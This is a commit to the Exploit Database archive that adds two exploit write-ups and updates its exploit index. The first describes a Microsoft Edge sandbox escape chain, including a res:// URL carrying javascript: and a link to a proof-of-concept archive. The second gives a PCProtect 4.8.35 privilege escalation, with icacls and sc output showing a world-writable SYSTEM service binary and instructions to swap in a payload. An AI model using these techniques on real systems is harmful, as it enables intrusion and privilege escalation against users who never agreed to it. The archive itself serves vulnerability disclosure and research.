DB: 2018-09-29

2 changes to exploits/shellcodes Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath Linux Kernel - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath Local Privilege Escalation PCProtect 4.8.35 - Privilege Escalation Microsoft Edge - Sandbox Escape
2018-09-29 05:01:58 +00:00 · 2018-09-29 05:01:58 +00:00 · a54a696d48
commit a54a696d48
parent 91ac09507e
3 changed files with 82 additions and 1 deletions
--- a/exploits/windows/remote/45502.txt
+++ b/exploits/windows/remote/45502.txt
@ -0,0 +1,22 @@
+1. Content process -> Privileged content process (first_stage.js)
+When spawning a new Edge content process, its privilege is determined by its URL. This URL check is performed by the LCIEUrlPolicy::GetPICForPrivilegedInternalPage method in eModel.dll. The method calls several another methods to check the URL. One of them EdgeUrlUtils::IsAboutFlagsResUri is vulnerable. Since it only checks the scheme and whether the URL ends with "/edgehtml.dll/flags.htm", the following URL which will execute arbitrary JavaScript code will be considered to need to spawn a privileged content process.
+
+res://apds.dll/redirect.html?target=javascript:alert(1)//edgehtml.dll/flags.htm
+
+As a navigation triggered from JavaScript to the "res" scheme is not allowed, an additional renderer exploit is required. I used   issue 1588   for it.
+
+2. Privileged content process -> Internet Explorer (second_stage.js)
+In a privileged content process, we can ask to the host to launch IE for some sites for compatibility. The host then redirects the request to the broker after checking whether the domain of the requested URL is in the IE compatibility view list. Since it only checks the domain, an arbitrary scheme like "file://" can be given.
+
+For this part, a domain in the IE compatibility view list is required to host a samba server. I found that some domains were unregistered, but I just modified the hosts file for testing.
+
+3. Internet Explorer
+If the given URL has the "file://" scheme and it's a folder, IE will just open it using ShellExecuteExW. I managed to create a lnk file that bypasses the folder check and executes an arbitrary file. Please find lnk_bug.cc in the PoC.
+
+
+
+To reproduce the PoC, you will need a remote machine hosting a samba server and a http server. Note that the PoC uses hardcoded offsets for "Build 17692.rs_prerelease.180609-1317".
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45502.zip
--- a/exploits/windows_x86-64/local/45503.txt
+++ b/exploits/windows_x86-64/local/45503.txt
@ -0,0 +1,57 @@
+# Exploit Title: PCProtect 4.8.35 - Privilege Escalation
+# Date: 2018-09-11
+# Exploit Author: Hashim Jawad - @ihack4falafel
+# Vendor Homepage: https://www.pcprotect.com/
+# Vulnerable Software: https://www.pcprotect.com/download
+# Tested on: Windows 7 Enterprise SP1 (x64)
+
+# Description:
+# PCProtect Anti-Virus v4.8.35 installs by default to "C:\Program Files (x86)\PCProtect" with very 
+# weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the 
+# directory and it's subfolders. In addition, the program installs a service called "SecurityService" 
+# which runs as "Local system account", this will allow any user to escalate privileges 
+# to "NT AUTHORITY\SYSTEM" by substituting the service's binary with malicious one.
+
+# PoC
+
+C:\Users\IEUser>icacls "c:\Program Files (x86)\PCProtect"
+c:\Program Files (x86)\PCProtect BUILTIN\Users:(OI)(CI)(F)
+                                 Everyone:(OI)(CI)(F)
+                                 NT SERVICE\TrustedInstaller:(I)(F)
+                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                                 NT AUTHORITY\SYSTEM:(I)(F)
+                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                                 BUILTIN\Administrators:(I)(F)
+                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                                 BUILTIN\Users:(I)(RX)
+                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\Users\IEUser>sc qc SecurityService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SecurityService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : PC Security Management Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\IEUser>icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
+C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
+                                                     Everyone:(I)(F)
+                                                     NT AUTHORITY\SYSTEM:(I)(F)
+                                                     BUILTIN\Administrators:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\Users\IEUser>
+
+# Exploit:
+# Simply replace "SecurityService.exe" with your preferred payload and wait for execution upon reboot.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10003,8 +10003,9 @@ id,file,description,date,author,type,platform,port
 45467,exploits/windows_x86/local/45467.py,"Easy PhoroResQ 1.0 - Buffer Overflow",2018-09-25,"Cemal Cihad ÇİFTÇİ",local,windows_x86,
 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris,
 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86,
-45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux,
+45497,exploits/linux/local/45497.txt,"Linux Kernel - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath Local Privilege Escalation",2018-09-26,"Google Security Research",local,linux,
 45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows,
+45503,exploits/windows_x86-64/local/45503.txt,"PCProtect 4.8.35 - Privilege Escalation",2018-09-28,"Hashim Jawad",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16837,6 +16838,7 @@ id,file,description,date,author,type,platform,port
 45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java,
 45427,exploits/hardware/remote/45427.py,"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)",2018-09-18,"Jacob Baines",remote,hardware,80
 45429,exploits/windows/remote/45429.txt,"Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution",2018-09-18,"Che-Chun Kuo",remote,windows,
+45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,